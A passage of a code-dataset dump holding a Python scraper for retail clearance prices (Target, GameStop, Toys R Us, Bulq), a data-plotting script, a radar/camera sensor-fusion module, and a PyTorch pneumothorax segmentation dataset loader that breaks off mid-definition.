browser.find_element_by_css_selector('#js-show-more-details')\n\t\t\tActionChains(browser).move_to_element(more_info).perform()\n\t\t\tmore_info.click()\n\t\t\t#Generate a list of the product attributes and cycle through them to find the ones we want\n\t\t\tattributes = browser.find_element_by_css_selector('#tab-content-details > ul').find_elements_by_tag_name('li')\n\t\t\tfor atr in attributes:\n\t\t\t\tif atr.text.find('UPC') == 0:\n\t\t\t\t\tupc = atr.text[atr.text.find(':') + 2:]\n\t\t\t\telif atr.text.find('Store Item Number (DPCI):') == 0: \n\t\t\t\t\ttargetid = atr.text[atr.text.find(':') + 2:]\n\t\t\t#Extra step conditional if the price was originally hidden; we navigate to the cart to scrape\n\t\t\tif price == 'see low price in cart':\n\t\t\t\tcart = browser.find_element_by_css_selector('#AddToCartAreaId > div:nth-child(1) > div > button')\n\t\t\t\tActionChains(browser).move_to_element(cart).perform()\n\t\t\t\tcart.click()\n\t\t\t\tgo_to_cart = browser.find_element_by_css_selector('#block-ATC > div.modal-dialog > div > div.modal-body.content-ATC > div > div.stayOnAfterATC-modal-success > div.h-tightSpacingTop > button')\n\t\t\t\tgo_to_cart.click()\n\t\t\t\tprice = browser.find_element_by_css_selector('div.cartItem--price.h-text-red').text\n\t\t\tmaster.append([name,price,upc,targetid])\n\t\tbrowser.close()\n\t\treturn master\n\t\n\t#Easier method call\n\tdef get_clearance(self):\n\t\tmaster = self.get_products()\n\t\tself.generate_csv(master)\n\t\treturn master\n\t\n\t#Generates the csv 
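(pipe-delimited)\n\t# Note (added): quotechar=' ' effectively disables real quoting here, so a '|'\n\t# inside a product name would still break a row; csv.QUOTE_NONE together with an\n\t# escapechar would be a safer way to guard the delimiter.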
\n\tdef generate_csv(self, data):\n\t\twith open('products' + str(date.today()) + '.csv', 'w') as csvfile:\n\t\t\tproductwriter = csv.writer(csvfile, delimiter='|', quotechar=' ')\n\t\t\tfor data2 in data:\n\t\t\t\ttry: productwriter.writerow(data2)\n\t\t\t\texcept UnicodeEncodeError:\n\t\t\t\t\tpass\n\t\t\t\t\t\n#######################################################################################################################\n#UNDER DEVELOPMENT\nclass gamestop:\n#Gamestop IS being a bitch, use ghost or webdriver\n\tdef __init__(self, https):\n\t\tself.https = https\n\t\t\n\t#Initialize the object on the deals section \n\tdef get_prod_lnks(self,limit):\n\t\tlink_list = []\n\t\turllist = [self.https]\n\t\tbrowser = webdriver.Chrome()\n\t\tbrowser.implicitly_wait(5)\n\t\tfor x in range(limit):\n\t\t\tif x == 0:\n\t\t\t\tbrowser.get(urllist[-1])\n\t\t\t\texpand_items = browser.find_element_by_link_text('Show 50')\n\t\t\t\texpand_items.click()\n\t\t\t\tlinks = browser.find_elements_by_css_selector(\"a[class='ats-product-title-lnk']\")\n\t\t\t\tfor link in links:\n\t\t\t\t\tlink = link.get_attribute('href')\n\t\t\t\t\tlink_list.append(link)\n\t\t\t\tnext_page = browser.find_element_by_link_text('Next')\n\t\t\t\tnext_page = next_page.get_attribute(\"href\")\n\t\t\t\turllist.append(next_page)\n\t\t\telse:\n\t\t\t\tbrowser.get(urllist[-1])\n\t\t\t\tlinks = browser.find_elements_by_css_selector(\"a[class='ats-product-title-lnk']\")\n\t\t\t\tfor link in links:\n\t\t\t\t\tlink = link.get_attribute('href')\n\t\t\t\t\tlink_list.append(link)\n\t\t\t\tnext_page = browser.find_element_by_link_text('Next')\n\t\t\t\tnext_page = next_page.get_attribute(\"href\")\n\t\t\t\turllist.append(next_page)\n\t\tbrowser.close()\n\t\tprint(len(link_list))\n\t\treturn link_list\n\t\t\n\tdef get_products(self,link_list):\n\t\tmaster = []\n\t\tcounter = 0\n\t\tbrowser = webdriver.Chrome()\n\t\tbrowser.maximize_window()\n\t\tbrowser.implicitly_wait(5)\n\t\tfor link in link_list:\n\t\t\tcounter += 1\n\t\t\tproduct = browser.get(link)\n\t\t\ttry: \n\t\t\t\ta = browser.find_element_by_css_selector(\"h1[itemprop='name']\").text\n\t\t\texcept NoSuchElementException:\n\t\t\t\tcontinue \n\t\t\tb = a[a.find('\\n')+5::]\n\t\t\ta = a[:a.find('by')]\n\t\t\tc = browser.find_element_by_css_selector(\"h3[class='ats-prodBuy-price']\").find_element_by_tag_name('span').text\n\t\t\tprint(counter,a)\n\t\t\tprint(b)\n\t\t\tprint('$'+c)\n\t\t\tmaster.append([a + ' ' + b,c])\n\t\tbrowser.close()\n\t\treturn master\n\n\t#Easier method call\n\tdef get_deals(self,number_pages):\n\t\tmaster = self.get_products(self.get_prod_lnks(number_pages))\n\t\tself.generate_csv(master)\n\t\treturn master\n\t\t\n\t#Generates the csv \n\tdef generate_csv(self, data):\n\t\twith open('products' + str(date.today()) + '.csv', 'w') as csvfile:\n\t\t\tproductwriter = csv.writer(csvfile, delimiter='|', quotechar=' ')\n\t\t\tfor data2 in data:\n\t\t\t\ttry: productwriter.writerow(data2)\n\t\t\t\texcept UnicodeEncodeError:\n\t\t\t\t\tpass\n\t\t\t\t\t\n#######################################################################################################################\n\nclass toysrus:\n\tdef __init__(self, https):\n\t\tself.https = https\n\t\t\n\tdef page_flipper(self,limit):\n\t\turllist = [self.https]\n\t\tfor x in range(limit):\n\t\t\tpage = r.get(urllist[-1])\n\t\t\tsoup = BeautifulSoup(page.text, 'html.parser')\n\t\t\tpage.close()\n\t\t\tnext_page = 'http://www.toysrus.com/' + 
soup.find('span',{\"class\":\"next\"}).parent.get('href')[2:]\n\t\t\turllist.append(next_page)\n\t\treturn urllist\n\t\t\n\tdef get_products(self,pages):\n\t\tmaster = []\n\t\tfor page in pages:\n\t\t\tpage = r.get(page)\n\t\t\tsoup = BeautifulSoup(page.text, 'html.parser')\n\t\t\tpage.close()\n\t\t\tlink_list = []\n\t\t\tlink_soup = soup.find_all('a', {'class':'prodtitle'})\n\t\t\tfor link in link_soup:\n\t\t\t\tlink_list.append(link)\n\t\t\tcounter = 0\n\t\t\tfor link in link_list:\n\t\t\t\tcounter += 1\n\t\t\t\tlink = 'http://www.toysrus.com' + link.get('href')\n\t\t\t\tpage = r.get(link)\n\t\t\t\tsoup = BeautifulSoup(page.text, 'html.parser')\n\t\t\t\tpage.close()\n\t\t\t\t#need to put exception handling for None types\n\t\t\t\ttry: a = soup.find('h1').string\n\t\t\t\texcept AttributeError:\n\t\t\t\t\ta = 'Product Name Error'\n\t\t\t\ttry: b = soup.find('li', {'class':'retail fl '}).span.string\n\t\t\t\texcept AttributeError:\n\t\t\t\t\tb = 'Product Price Error'\n\t\t\t\ttry: c = soup.find('p', {'class':'upc'}).span.string\n\t\t\t\texcept AttributeError: \n\t\t\t\t\tc = 'Product UPC Error'\n\t\t\t\ttry: d = soup.find('p', {'class':'skuText'}).span.string\n\t\t\t\texcept AttributeError:\n\t\t\t\t\td = 'Product SKU Error'\n\t\t\t\tprint(counter,a)\n\t\t\t\tprint(b)\n\t\t\t\tprint(c,d)\n\t\t\t\tmaster.append([a,b,c,d])\n\t\treturn master \n\n\t#Easier method call\n\tdef get_clearance(self,number_pages):\n\t\tmaster = self.get_products(self.page_flipper(number_pages))\n\t\tself.generate_csv(master)\n\t\treturn master\t\t\n\t\t\n\t#Generates the csv \n\tdef generate_csv(self, data):\n\t\twith open('products' + str(date.today()) + '.csv', 'w') as csvfile:\n\t\t\tproductwriter = csv.writer(csvfile, delimiter='|', quotechar=' ')\n\t\t\tfor data2 in data:\n\t\t\t\ttry: productwriter.writerow(data2)\n\t\t\t\texcept UnicodeEncodeError:\n\t\t\t\t\tpass\n\t\t\t\t\t\n######################################################################################################################\n\nclass bulq:\n# Individual Links : pallet_tile__link\n# Pallet/Case Name h2 : class: pallet_title\n# Condition: div : class : condition__title\n# Price : div : class: pricing__bulq-price\n# Shipping : div : class: pricing__shipping \n# Manifest Download: a : class: pallet-manifest-btn\n# Next Page : a : class: page-link--relative\n# Need some path of where to save the file?\n\n\tdef __init__(self, https):\n\t\tself.https = https\n\t\t\n\tdef flip_page(self, number_pages, location='recent'):\n\t\t# Adding a option of WHERE you want to scrape the links \n\t\t# Returns a list of where to scrape from\n\t\tpages = []\n\t\tbrowser = webdriver.Chrome()\n\t\tbrowser.maximize_window()\n\t\tbrowser.get(self.https) \n\t\tclick_here = browser.find_element_by_css_selector('a.btn:nth-child(3)')\n\t\tclick_here.click()\n\t\tpages.append(browser.current_url)\n\t\tif location == 'recent':\n\t\t\tfor x in range(1, number_pages):\n\t\t\t\tpagestr = '&page='\n\t\t\t\tpageins = pagestr + str(x)\n\t\t\t\tpageins = pages[0] + pageins\n\t\t\t\tpages.append(pageins)\n\t\tbrowser.close()\n\t\treturn pages\n\t\n\tdef get_pallet(self, pages, case_or_pallet = 'both'):\n\t# Can change key word argument to case or pallet to just get the \n\t# links on those \n\t\titemlist = []\n\t\tbrowser = webdriver.Chrome()\n\t\tbrowser.implicitly_wait(5)\n\t\tif case_or_pallet == 'both':\n\t\t\tfor page in pages:\n\t\t\t\t#print(page)\n\t\t\t\tbrowser.get(page)\n\t\t\t\titems = browser.find_elements_by_css_selector(\"div[class='photo']\")\n\t\t\t\tfor item in 
items:\n\t\t\t\t\titem = item.find_element_by_tag_name('a')\n\t\t\t\t\titmlink = item.get_attribute(\"href\")\n\t\t\t\t\titemlist.append(itmlink)\n\t\t\tbrowser.close()\n\t\treturn itemlist\n\t\n\tdef get_info(self, itemlist, manifest=False):\n\t# Get the information on the specific pallet/case including the price, and the \n\t# top products, and the manifest if wanted\n\t\tmaster = []\n\t\tbrowser = webdriver.Chrome()\n\t\tfor itm in itemlist:\n\t\t\tbrowser.get(itm)\n\t\t\titmname = browser.find_element_by_xpath(\"/html/body/div[2]/div/div[1]/div[3]/h2\").text \n\t\t\tprint(itmname)\n\t\t\titmcondition = browser.find_element_by_css_selector(\"div[class='condition']\").text\n\t\t\titmprice = browser.find_element_by_css_selector(\"div[class='pricing__bulq-price']\").text\n\t\t\titmship = browser.find_element_by_css_selector(\"div[class='pricing__shipping']\").text\n\t\t\t# Converting the item price and the shipping price to one single price\n\t\t\titmcomb = str(float(itmprice) + float(itmship))\n\t\t\t# Downloading the manifest\n\t\t\tif manifest == True:\n\t\t\t\t# Not exactly sure \n\t\t\t\titm_man_file = browser.find_element_by_css_selector(\"a[class='pallet-manifest-btn']\").get_attribute(\"href\")\n\t\t\t\tmanifest = r.get(itm_man_file, stream=True)\n\t\t\t# Do I want to scrape the top three items in the pallet / case?\n\t\t\tmaster.append([itmname, itmcondition, itmcomb])\n\t\tbrowser.close()\n\t\treturn master\n\t\t\n\t# Easier method call\n\tdef crapacopia(self,number_pages):\n\t\tmaster = self.get_info(self.get_pallet(self.flip_page(number_pages)))\n\t\tself.generate_csv(master)\n\t\treturn master\n\t\n\t# Generates the csv \n\tdef generate_csv(self, data):\n\t\twith open('products' + str(date.today()) + '.csv', 'w') as csvfile:\n\t\t\tproductwriter = csv.writer(csvfile, delimiter='|', quotechar=' ')\n\t\t\tfor data2 in data:\n\t\t\t\ttry: productwriter.writerow(data2)\n\t\t\t\texcept UnicodeEncodeError:\n\t\t\t\t\tpass","sub_path":"shopbazaar/bazaar.py","file_name":"bazaar.py","file_ext":"py","file_size_in_byte":15149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"341384128","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom file_reader import plot_runs, Run\n\npath = \"new setup background tests/\"\n\nno_walls = Run(path + \"2018_05_25__13_44_05.txt\")\nsame_side = Run(path + \"2018_05_25__13_57_52.txt\")\nopposite_side = Run(path + \"2018_05_25__14_06_33.txt\")\n\nmin_oil = Run(path + \"2018_05_29__16_22_24.txt\")\n\nruns = [no_walls, same_side, opposite_side, min_oil]\n\nplot_runs(runs, labels=[\"no walls in air\", \"walls opposite laser and detector in air\", \"walls opposite laser and on same side as detector in air\", \"new setup in mineral oil\"], show=False, rot=True)\n\n# copied from 10_16_background_tests.py, using data from background_measurements/background in mineral oil no sample old walls new walls lens tubes.txt\ndistance_from_sample_to_photodiode = 5.435\nphotodiode_radius = (9 / 2.0) / 25.4\nphotodiode_solid_angle = np.pi * np.power(photodiode_radius, 2) / np.power(distance_from_sample_to_photodiode, 2)\nflux_i = 0.005940 * 100e-6\nsensitivity = 100 * 1e-9\nintensity_factor = sensitivity / (photodiode_solid_angle * flux_i)\n\ntotal_data = np.loadtxt(\"old_setup_data/background in mineral oil no sample old walls new walls lens tubes.txt\", skiprows=1)\ntotal_data_x = [180 - 90 - np.round(d[0], 2) for d in total_data]\ntotal_data_y = [intensity_factor * d[1] for d in total_data]\n\nold_data_x 
= total_data_x[0:302]\nold_data_y = total_data_y[0:302]\nplt.scatter(old_data_x, old_data_y, marker=\"x\", c=\"c\", s=5, label=\"old setup in mineral oil\")\n\nplt.legend()\nplt.xlim(0, 170)\n\nplt.show()\n","sub_path":"new_setup_background_tests.py","file_name":"new_setup_background_tests.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"440002369","text":"# !/usr/bin/env python3\n\nfrom abc import ABC, abstractmethod\nfrom typing import List\nimport numpy as np\nfrom scipy.optimize import linear_sum_assignment\nfrom scipy.linalg import block_diag\n\nfrom .transform import w2p, p2w\nfrom .poi_and_roi import radar_poi, expand_poi, optimize_iou\n\n# TODO: move to geometry.yaml\nSCENE_THRESHOLD = 0.5\n\n\nclass Sensor(ABC):\n\n @abstractmethod\n def __init__(self, name: str, R: np.ndarray, obs_size: int) -> None:\n self.name = name\n self.obs_size = obs_size\n self.zs = np.empty((0, obs_size))\n self.R = R\n\n @abstractmethod\n def update(self, data: np.ndarray) -> None:\n pass\n\n @abstractmethod\n def obs_filter(self, useless_indices: np.ndarray) -> None:\n pass\n\n @abstractmethod\n def H(self, pred_xpt: np.ndarray) -> np.ndarray:\n pass\n\n @abstractmethod\n def obs2world(self, zs: np.ndarray = None) -> np.ndarray:\n pass\n\n @abstractmethod\n def world2obs(self, pos: np.ndarray) -> np.ndarray:\n pass\n\n def __repr__(self) -> str:\n return self.name\n\n def observe(self):\n zs, ss = [], []\n for z in self.zs:\n zs.append(z)\n ss.append(self)\n ps = self.obs2world()\n return ObsBundle(zs, ps, ss)\n\n\nclass RadarSensor(Sensor):\n\n def __init__(self, name: str, data: dict) -> None:\n \"\"\"The angles are all in deg\"\"\"\n R = np.array(data['R']).reshape(2, 2)\n super().__init__(name, R, 2)\n self.box_size = 3\n self.boxes = np.empty((0, self.box_size))\n self.offset = np.array(data['offset'])\n self.angle_offset = np.array(data['angle'])\n\n def update(self, data: np.ndarray) -> None:\n self.zs = self.__box2world(data)\n self.zs = self.zs + np.random.normal(0.0, 0.05, size=(len(self.zs), 2)) # add noise\n self.boxes = data[:, 0:self.box_size]\n\n def obs_filter(self, useless_indices: np.ndarray) -> None:\n idx = np.setdiff1d(np.arange(len(self.zs)), useless_indices)\n self.zs = self.zs[idx]\n self.boxes = self.boxes[idx]\n\n def H(self, pred_xpt: np.ndarray) -> np.ndarray:\n return np.eye(2)\n\n def __old_H(self, pred_xpt: np.ndarray) -> np.ndarray:\n x, y = pred_xpt[0] - self.offset[0], pred_xpt[1] - self.offset[1]\n r = np.linalg.norm([x, y])\n c, s = x / r, y / r\n Hr = np.array([[c, s], [-1 / (r * s), 1 / (r * c)]])\n return Hr\n\n def obs2world(self, zs: np.ndarray = None) -> np.ndarray:\n if zs is None:\n zs = self.zs\n return zs\n\n def __box2world(self, zs: np.ndarray = None) -> np.ndarray:\n if zs is None:\n zs = self.zs\n if len(zs) == 0:\n return np.empty((0, 2))\n else:\n x = self.offset[0] + zs[:, 0] * np.cos(np.deg2rad(zs[:, 1] + self.angle_offset))\n y = self.offset[1] + zs[:, 0] * np.sin(np.deg2rad(zs[:, 1] + self.angle_offset))\n return np.array([x, y]).T\n\n def __world2box(self, pos: np.ndarray) -> np.ndarray:\n x, y = pos[0] - self.offset[0], pos[1] - self.offset[1]\n r = np.linalg.norm([x, y])\n co, so = np.cos(np.deg2rad(self.angle_offset)), np.sin(np.deg2rad(self.angle_offset))\n x1, y1 = co * x + so * y, -so * x + co * y\n theta = np.rad2deg(np.arctan2(y1, x1))\n z = np.array([r, theta])\n return z\n\n def world2obs(self, pos: np.ndarray) -> np.ndarray:\n return 
pos\n\n\nclass ImageSensor(Sensor):\n\n def __init__(self, name: str, data: dict, target_height: float) -> None:\n R = np.array(data['R'], dtype=int).reshape((2, 2))\n super().__init__(name, R, 2)\n self.box_size = 6\n self.boxes = np.empty((0, self.box_size))\n self.width = data['width']\n self.height = data['height']\n self.w2c = np.array(data['w2c']).reshape((4, 4))\n self.c2p = np.array(data['c2p']).reshape((3, 4))\n self.target_height = target_height\n\n def update(self, data: np.ndarray) -> None:\n self.zs = np.concatenate([(data[:, 0:1] + data[:, 2:3]) // 2, (data[:, 1:2] + 3 * data[:, 3:4]) // 4],\n axis=1,\n dtype=int)\n self.boxes = data[0:6]\n\n def obs_filter(self, useless_indices: np.ndarray) -> None:\n idx = np.setdiff1d(np.arange(len(self.zs)), useless_indices)\n self.zs = self.zs[idx]\n self.boxes = self.boxes[idx]\n\n def H(self, pred_xpt: np.ndarray) -> np.ndarray:\n uv, zc = w2p(np.array([pred_xpt[0], pred_xpt[1], self.target_height, 1]), self.w2c, self.c2p)\n m0 = np.matmul(self.c2p, self.w2c)[0:2, 0:2]\n m1 = np.outer(uv[0:2], self.w2c[2, 0:2])\n Hi = (m0 - m1) / zc\n return Hi\n\n def obs2world(self, zs: np.ndarray = None) -> np.ndarray:\n if zs is None:\n zs = self.zs\n if len(zs) == 0:\n return np.empty((0, 2))\n else:\n return np.array([p2w(obs, self.target_height, self.w2c, self.c2p)[0][0:2] for obs in zs])\n\n def world2obs(self, pos: np.ndarray) -> np.ndarray:\n return w2p(np.array([pos[0], pos[1], self.target_height, 1]), self.w2c, self.c2p)[0][0:2]\n\n\nclass FusedSensor(Sensor):\n\n def __init__(self, sensors: List[Sensor], weights: List[float]) -> None:\n if len(sensors) != len(weights):\n raise ValueError(\"sensors: {}, weights: {}\".format(len(sensors), len(weights)))\n name, Rs, obs_sizes = \"Fusion_of\", [], []\n for s in sensors:\n name += \"_{}\".format(s.name)\n Rs.append(s.R)\n obs_sizes.append(s.obs_size)\n R = block_diag(*Rs)\n super().__init__(name, R, sum(obs_sizes))\n self.obs_size_list = obs_sizes\n self.sensors = sensors\n self.weights = weights / np.sum(weights)\n\n def update(self, data: np.ndarray) -> None:\n self.zs = data[:, 0:self.obs_size]\n\n def obs_filter(self, useless_indices: np.ndarray) -> None:\n idx = np.setdiff1d(np.arange(len(self.zs)), useless_indices)\n self.zs = self.zs[idx]\n\n def H(self, pred_xpt: np.ndarray) -> np.ndarray:\n Hs = [s.H(pred_xpt) for s in self.sensors]\n return np.concatenate(Hs, axis=0)\n\n def obs2world(self, zs: np.ndarray = None) -> np.ndarray:\n if zs is None:\n zs = self.zs\n if len(zs) == 0:\n return np.empty((0, 2))\n else:\n start, poses = 0, []\n for s, obs_size in zip(self.sensors, self.obs_size_list):\n poses.append(s.obs2world(zs[:, start:start + obs_size]))\n start += obs_size\n pos = np.average(poses, 0, self.weights)\n return pos\n\n def world2obs(self, pos: np.ndarray) -> np.ndarray:\n zs = [s.world2obs(pos) for s in self.sensors]\n return np.concatenate(zs, axis=0)\n\n\nclass ObsBundle:\n\n def __init__(self, zs: List[np.ndarray], projs: np.ndarray, sensors: List[Sensor]) -> None:\n if len(zs) == len(projs) == len(sensors):\n self.zs = zs\n self.projections = projs\n self.sensors = sensors\n self.total_objs = len(self.zs)\n else:\n raise ValueError(\"ObsBundle initialization failed: zs: {}, ps: {}, ss: {}\".format(\n len(zs), len(projs), len(sensors)))\n\n def __repr__(self) -> str:\n if self.total_objs == 0:\n return \"Observations (0)\"\n else:\n return \"Observations ({}):\\n{}\\nProjections:\\n{}\\nFrom Sensors:\\n{}\".format(self.total_objs, self.zs,\n self.projections, 
self.sensors)\n\n def __add__(self, other):\n if self.total_objs == 0 or other.total_objs == 0:\n zs = self.zs + other.zs\n ps = np.concatenate([self.projections, other.projections], axis=0)\n ss = self.sensors + other.sensors\n return ObsBundle(zs, ps, ss)\n # two non-empty observations\n distances = np.array([np.linalg.norm(p1 - p2) for p1 in self.projections for p2 in other.projections]).reshape(\n (self.total_objs, other.total_objs))\n same_idx_1, same_idx_2 = linear_sum_assignment(distances)\n thres_filter = distances[same_idx_1, same_idx_2] <= SCENE_THRESHOLD\n same_idx_1 = np.extract(thres_filter, same_idx_1)\n same_idx_2 = np.extract(thres_filter, same_idx_2)\n diff_idx_1 = np.setdiff1d(np.arange(self.total_objs), same_idx_1)\n diff_idx_2 = np.setdiff1d(np.arange(other.total_objs), same_idx_2)\n # TODO: improve coding\n ps = np.concatenate([\n self.projections[diff_idx_1], other.projections[diff_idx_2],\n (self.projections[same_idx_1] + other.projections[same_idx_2]) / 2\n ],\n axis=0)\n zs, ss = [], []\n for i in diff_idx_1:\n zs.append(self.zs[i])\n ss.append(self.sensors[i])\n for i in diff_idx_2:\n zs.append(other.zs[i])\n ss.append(other.sensors[i])\n for i1, i2 in zip(same_idx_1, same_idx_2):\n if self.sensors[i1] is other.sensors[i2]:\n zs.append(self.zs[i1])\n ss.append(self.sensors[i1])\n else:\n zs.append(np.concatenate([self.zs[i1], other.zs[i2]]))\n ss.append(FusedSensor([self.sensors[i1], other.sensors[i2]], [0.5, 0.5]))\n return ObsBundle(zs, ps, ss)\n\n\nclass SensorCluster:\n\n def __init__(self, radar_sensors: List[RadarSensor], image_sensors: List[ImageSensor]) -> None:\n self.radar_sensors = radar_sensors\n self.image_sensors = image_sensors\n self.pair_1 = SensorPair(self.radar_sensors[0], self.image_sensors[2], 0.6) # rad 2, cam 5\n self.pair_2 = SensorPair(self.radar_sensors[1], self.image_sensors[3], 0.6) # rad 3, cam 6\n\n def update(self, radar_data: List[np.ndarray], image_data: List[np.ndarray]) -> None:\n for s, d in zip(self.radar_sensors, radar_data):\n s.update(d)\n for s, d in zip(self.image_sensors, image_data):\n s.update(d)\n\n def observe(self) -> ObsBundle:\n '''\n zs_2 = self.pair_1.observe()\n zs_3 = self.pair_2.observe()\n zs = zs_2 + zs_3\n return zs\n '''\n zs_2 = self.radar_sensors[0].observe()\n zs_3 = self.radar_sensors[1].observe()\n zs = zs_2 + zs_3\n return zs\n\n\nclass SensorPair:\n\n def __init__(self, radar_sensor: RadarSensor, image_sensor: ImageSensor, iou_threshold: float) -> None:\n self.radar = radar_sensor\n self.image = image_sensor\n self.fused_sensor = FusedSensor([radar_sensor, image_sensor], [1.0, 0.0])\n self.iou_threshold = iou_threshold\n\n def update(self, radar_data: np.ndarray, image_data: np.ndarray) -> None:\n self.radar.update(radar_data)\n self.image.update(image_data)\n\n def observe(self) -> ObsBundle:\n radar_pois = radar_poi(self.radar.obs2world(), self.image.w2c, self.image.c2p, self.image.target_height)\n image_rois = self.image.boxes[0:4]\n # IOU matching\n radar_expanded_rois = np.array(list(\n map(lambda p, d: expand_poi(p, d, self.image.width, self.image.height), radar_pois, self.radar.zs[:, 0])),\n dtype=int)\n fused_rad_idx, fused_cam_idx = optimize_iou(radar_expanded_rois, image_rois, self.iou_threshold)\n # get observation bundle\n fused_zs = np.concatenate([self.radar.zs[fused_rad_idx, 0:3], self.image.zs[fused_cam_idx, 0:2]], axis=1)\n self.fused_sensor.update(fused_zs)\n self.radar.obs_filter(fused_rad_idx)\n self.image.obs_filter(fused_cam_idx)\n # TODO: improve code\n zs, ss = [], []\n ps = 
np.concatenate([self.fused_sensor.obs2world(), self.radar.obs2world(), self.image.obs2world()], axis=0)\n for s in [self.fused_sensor, self.radar, self.image]:\n for z in s.zs:\n zs.append(z)\n ss.append(s)\n return ObsBundle(zs, ps, ss)\n","sub_path":"src/site_model/src/utils/sensor_and_obs.py","file_name":"sensor_and_obs.py","file_ext":"py","file_size_in_byte":12080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"556144528","text":"\n\nimport torch\nimport torch.utils.data\nfrom imgaug import augmenters as iaa\nimport random\nimport numpy as np\nimport cv2\nimport pydicom\nfrom scipy.sparse import csc_matrix, save_npz, load_npz\nimport scipy\n\n \nclass PneumoniaDataset(torch.utils.data.Dataset):\n def __init__(self,df, dims=1024, patchSz=256, miniBatch=1, \n train=True,val=False,transform=False):\n \"\"\"\n Args:\n text_file(string): path to text file\n root_dir(string): directory with all train images\n \"\"\"\n self.train = train\n self.val = val\n self.df = df\n self.transform = transform\n self.dims = dims\n self.patchSz = patchSz\n self.sz = miniBatch \n\n \n def cropPad(self,imgs, lbls):\n augmenters_imgs = [\n iaa.CropAndPad(percent=(-0.5, 0.2)\n )] \n \n seq_imgs = iaa.Sequential(augmenters_imgs, random_order=False) \n seq_imgs_deterministic = seq_imgs.to_deterministic()\n\n imgs_aug = seq_imgs_deterministic.augment_images(imgs)\n masks_aug = seq_imgs_deterministic.augment_images(lbls)\n return imgs_aug, masks_aug\n\n def affine(self,imgs, lbls):\n augmenters_imgs = [\n iaa.Affine(scale=(.7,1)\n )] \n \n seq_imgs = iaa.Sequential(augmenters_imgs, random_order=False) \n seq_imgs_deterministic = seq_imgs.to_deterministic()\n\n imgs_aug = seq_imgs_deterministic.augment_images(imgs)\n masks_aug = seq_imgs_deterministic.augment_images(lbls)\n return imgs_aug, masks_aug\n \n \n # def resize(self, idx): \n # img = pydicom.dcmread(self.df.iloc[idx]['file_path']).pixel_array\n # img = scipy.misc.imresize(img, (self.dims,self.dims))\n\n # if self.train:\n # if self.df.iloc[idx]['has_pneumothorax']:\n # mk = load_npz('siim/mask/'+self.df.iloc[idx]['id']+'.npz').todense().astype('uint8')\n # mk[mk>0]=1\n # mk = scipy.misc.imresize(mk,(self.dims,self.dims)).astype('uint8')\n # return img/255, mk\n # else:\n # mk = np.zeros((self.dims, self.dims), dtype=np.uint8)\n # return img/255, mk\n # else:\n # return img/255\n \n def getImage(self, idx):\n img = pydicom.dcmread(self.df.iloc[idx]['file_path']).pixel_array \n if self.train:\n if self.df.iloc[idx]['has_pneumothorax']:\n mk = load_npz('siim/mask/'+self.df.iloc[idx]['id']+'.npz').todense().astype('uint8')\n mk[mk>0]=1\n return img/255, mk\n else:\n mk = np.zeros((self.dims, self.dims), dtype=np.uint8)\n return img/255, mk\n else:\n return img/255\n\n def sample(self):\n #the dataset was split where the first 1903 samples are pos and the rest are neg\n pos = 1903\n neg = 1904\n randy = random.randint(0,4)\n if randy==4:\n return random.randint(neg, len(self.df)-1)\n else: return random.randint(0,pos)\n\n def transform_(self, image, mask):\n# print('transform') \n randy = random.randint(0,2)\n \n if randy == 0:\n pass #nothing, just a normal image\n \n #flip left to right only\n if randy == 1:\n image = np.fliplr(image).copy()\n mask = np.fliplr(mask).copy()\n\n #flip up or down only\n if randy ==2:\n image = np.flipud(image).copy()\n mask = np.flipud(mask).copy() \n \n#\n #need to reshape here before using iaa augs\n image = np.expand_dims(image, axis=0)\n mask = np.expand_dims(mask, 
axis=0)\n# https://imgaug.readthedocs.io/en/latest/source/augmenters.html\n\n        if self.transform:\n            randy = random.randint(0,3)\n            if randy ==0:\n                aug = iaa.GaussianBlur(sigma=(1.0,2.0))\n                image = aug.augment_images(image)\n\n            if randy == 1:\n                image, mask = self.affine(image, mask)\n\n            else:\n                pass\n\n        return image, mask\n\n\n    def getPatches(self, img, mk):\n        # Sample sz patches of patchSz x patchSz, centred on mask pixels when the mask is non-empty\n        sz = self.sz\n        if img.ndim==3:\n            img = img.squeeze()\n            mk = mk.squeeze()\n\n        X_train = np.zeros((sz, self.patchSz, self.patchSz), dtype=np.float32)\n        Y_train = np.zeros((sz, self.patchSz, self.patchSz), dtype=np.uint8)\n\n        half = self.patchSz//2\n        list_pos = np.argwhere(mk>0)\n        if len(list_pos)>0:\n            for i in range(sz):\n                randy = np.random.randint(list_pos.shape[0])\n                x,y = list_pos[randy]\n                # clamp the patch centre so the crop stays fully inside the image\n                if x <half: x=half\n                if y <half: y=half\n                if x >(self.dims-half): x=self.dims-half\n                if y >(self.dims-half): y=self.dims-half\n                # print(x-half, x+half, y-half, y+half)\n                X_train[i] = img[x-half:x+half,y-half:y+half]\n                Y_train[i] = mk[x-half:x+half,y-half:y+half]\n        else:\n            for i in range(sz):\n                x= np.random.randint(half,1024-half)\n                y= np.random.randint(half,1024-half)\n                X_train[i] = img[x-half:x+half,y-half:y+half]\n\n        return X_train, Y_train\n\n\n    def __len__(self):\n        if len(self.df) > 3000:\n            return 4000\n        return len(self.df)\n\n    def __getitem__(self, idx):\n        # print('idx:',idx)\n        if self.train:\n            if self.val:\n                # print('idx',idx)\n                img, mk = self.getImage(idx)\n                img, mk = self.getPatches(img, mk)\n                img = np.expand_dims(img, axis=1)\n                mk = np.expand_dims(mk, axis=1)\n                return img, mk\n\n            # print('about to sample')\n            #get an index\n            idx = self.sample()\n            #get image\n            img, mk = self.getImage(idx)\n            #get augmentations\n            img, mk = self.transform_(img, mk)\n            #break into patches\n            img, mk = self.getPatches(img, mk)\n            img = np.expand_dims(img, axis=1)\n            mk = np.expand_dims(mk, axis=1)\n\n            for i in range(img.shape[0]): # should be size of miniBatch\n                randy = random.randint(0,99)\n                if randy >70:\n                    img[i], mk[i] = self.cropPad(img[i], mk[i])\n\n            return img, mk\n\n        # print('made it outside')\n        # img = self.resize(idx)\n        # img = img.reshape(1,self.dims, self.dims)\n        # return img\n        print('Should not be here, use the test dataset')\n\n\nclass PneumoniaDataset_test(torch.utils.data.Dataset):\n    def __init__(self,df, dims=256):\n        \"\"\"\n        Args:\n            text_file(string): path to text file\n            root_dir(string): directory with all train images\n        \"\"\"\n        self.df = df\n        self.dims = dims\n\n    def 